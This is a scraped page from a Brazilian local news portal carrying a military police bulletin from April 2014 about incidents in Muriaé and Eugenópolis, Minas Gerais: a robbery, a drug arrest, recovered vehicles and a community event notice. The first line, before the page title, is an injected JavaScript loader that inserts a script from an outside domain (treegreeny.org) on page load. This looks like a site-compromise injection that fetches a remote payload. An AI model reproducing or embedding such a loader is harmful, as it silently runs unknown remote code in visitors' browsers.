;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais 11/04/2014. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais 11/04/2014.

pmbn

OCORRÊNCIAS DE DESTAQUE MURIAÉ – 10/04/2014

                        75ª CIA PM- CARANGOLA-MG

NADA A REGISTRAR.

                        76ª IA PM – MURIAÉ

  ROUBO CONSUMADO A PASAGEIRO DE VEICULO EM MURIAÉ-MG.

       Em 11/04/2014, por volta das 00h33min, policiais militares compareceram Av. Amâncio de Freitas, e em contato com a vítima Sr. A.S.S, de 25 anos, esta relatou que estacionou seu veículo em frente a casa de sua namorada A.G.S.S., 26 anos, ocasião que foi abordado por um cidadão trajando camisa vermelha, capacete preto e bermuda colorida, sendo de cútis branca, magro e aproximadamente 1,70m, que estava armado com um revolver oxidado médio e anunciou o assalto, roubando-lhe um cordão de ouro, uma pulseira de ouro e a quantia de R$50,00, em dinheiro e de sua namorada, amanda, uma joia de ouro (anel aparador). O autor em seguida desceu a citada rua e evadiu numa motocicleta Honda de cor prata, com adesivo no para-lamas dianteiro, que estava sendo conduzida por um cidadão trajando camisa branca, e saíram sentido ponte do porto, onde populares informaram aos policiais que a motocicleta passou em alta velocidade sentido BR-356. Os policiais iniciaram patrulhamento no bairro marambaia e localizaram pela Rua Belém, a motocicleta Honda CG 150 titan, de cor prata, com as mesmas características da utilizada no roubo, adesivo no para-lamas dianteiro, a qual estava estacionada em cima do passeio e segundo populares foi abandonada por duas pessoas com as mesmas características dos autores do roubo. Foi acionado o guincho credenciado e a motocicleta recolhida sendo os autores não identificados, permanecendo o rastreamento na busca dos envolvidos.

  TRAFICO DE DORGAS EM EUGENÓPOLIS – MG.           

            Em 10/04/2014, por volta das 19hs45min, policiais militares em rastreamento a suspeitos de furtos ocorridos na zona rural de Eugenópolis-MG, receberam denúncia via 190, dando conta que o autor estaria de posse dos equipamentos furtados em um bar localizado à rua Isabel Maria Gomes Cardoso, bairro Nossa Senhora de Fátima, sendo um celular e aparelho de som com entrada de Pen Drive. Pelo local os policiais depararam com o autor E.J.C.F, de 18 anos, em atitude suspeita tentando esconder dois sacoles de substâncias semelhante a cocaína e dois celulares dos militares. Diante do exposto foi dado busca pessoal no cidadão sendo localizado os citados  materiais, sendo que a testemunha informou que o jovem autor estaria tentando vender o equipamento pela rua. Já o autor declarou que desconhece a posse do som e que os celulares pertenciam a sua genitora, que por sua vez desconhece a propriedade dos equipamentos, todavia não apresentou documento que comprove sua propriedade. Indagado o autor disse ter comprado a referida droga de um cidadão morador do bairro triângulo em Patrocínio do Muriáe, que estaria na condução de uma moto Titan azul, fazendo a distribuição de drogas nas imediações. O autor foi preso e encaminhado para a delegacia de polícia juntamente com os materiais descritos.

 VEICULO RECUPERADO EM MURIAÉ – MG.

            Em 10/04/2014, por volta das 16hs11min, policiais militares durante patrulhamento pela Rua Francisco Cascelli, depararam com a motocicleta Honda/CBX 200 strada, cor roxa, placa GWU 5312/Muriaé-MG, estacionada, e por ser de conhecimento dos policiais daquela guarnição que um veiculo com as mesmas características estaria sendo utilizada para o cometimento de crimes na cidade, imediatamente os policias militares realizaram a abordagem o cidadão D.F.S., de 20 anos, que se encontrava sentado na calçada ao lado do referido veículo, onde o submeteram a busca pessoal não sendo encontrado nada de ilícito com o mesmo, contudo ao realizarem consulta do veiculo junto ao sistema informatizado, constataram que havia queixa de furto e roubo para a citada motocicleta. O suspeito alegou ser o proprietário da motocicleta e que comprou a mesma, porém declarou que em 09/02/2014 teve sua moto furtada na porta de sua casa, fazendo o registro da ocorrência relatando o furto, mas localizou a motocicleta alguns dias depois, tendo se apossado dela novamente mas não compareceu à delegacia para dar baixa na queixa de furto. Diante o exposto os policiais fizeram a apreensão do veiculo, tendo sido recolhido ao pátio credenciado, sendo convidado o suspeito a acompanhar os policiais até à delegacia para maiores esclarecimentos.

 VEICULO RECUPERADO EM MURIAÉ-MG.   ( REDS 2014-007806642-001  )

         Em data de 10/04/2014, por volta das 10hs07min, policiais militares deslocaram até rodovia BR 116, no pátio de uma oficina mecânica, onde estaria um veiculo pampa de cor branca placa GKX 1400, estacionado em atitude suspeita, e ao realizarem consulta no sistema informatizado através da sala de operações foram informados sobre sinalização de furto/roubo, ocorrido na cidade de Cataguases em data de 08/04/2014, sendo então acionado o guincho credenciado do Detran, que procedeu a remoção para as dependências da empresa, já no estacionamento daquela oficina, os policiais militares contactaram com algumas pessoas que preferiram manter o nome em sigilo nos narraram que na data do dia 08/04/2014, uma pessoa de porte físico magro de cor negra, trajava bermuda tectel branca com detalhes na cor preta camisa com listras rosa e verde e de boné preto, chegou no citado local pela manha e pediu para deixar tal veiculo naquela dependência, mexeu na caminhonete um pouco e saiu, na data de 09/04/14 retornou trajando as mesmas roupas porem do lado avesso, foi quando o proprietário da oficina mandou que retirasse o veiculo, porem estava sem bateria inviabilizando a retirada da caminhonete do estacionamento.

     NOTA DO COMANDO

             Em decorrência da comemoração do sétimo aniversário do 47º BPM, o Comando do 47º BPM, vem por meio desta solicitar aos parceiros da imprensa, que difundam a realização de uma Ação Cívico Social a ser realizada no bairro Aeroporto, na Rua Antônio Ramos esquina com Santos Dumont, no dia 26 de abril de 2014, onde serão ofertados serviços de atendimento médico, dentário na sede do PSF, rua de lazer, corte de cabelo, dentre outras atividades sociais. O evento conta com a parceria da Prefeitura Municipal de Muriaé e demais parceiros da PMMG.

            Haverá ainda a realização do 1º Passeio Ciclístico do 47º BPM, a ser realizado no dia 27/04/14, a partir das 08hs, com concentração prevista na Pça. João Pinheiro, com sorteio de bicicletas, sendo que para o sorteio os participantes deverão levar 1 quilo de alimento não perecível, onde receberão um cupom.

  ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM

RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.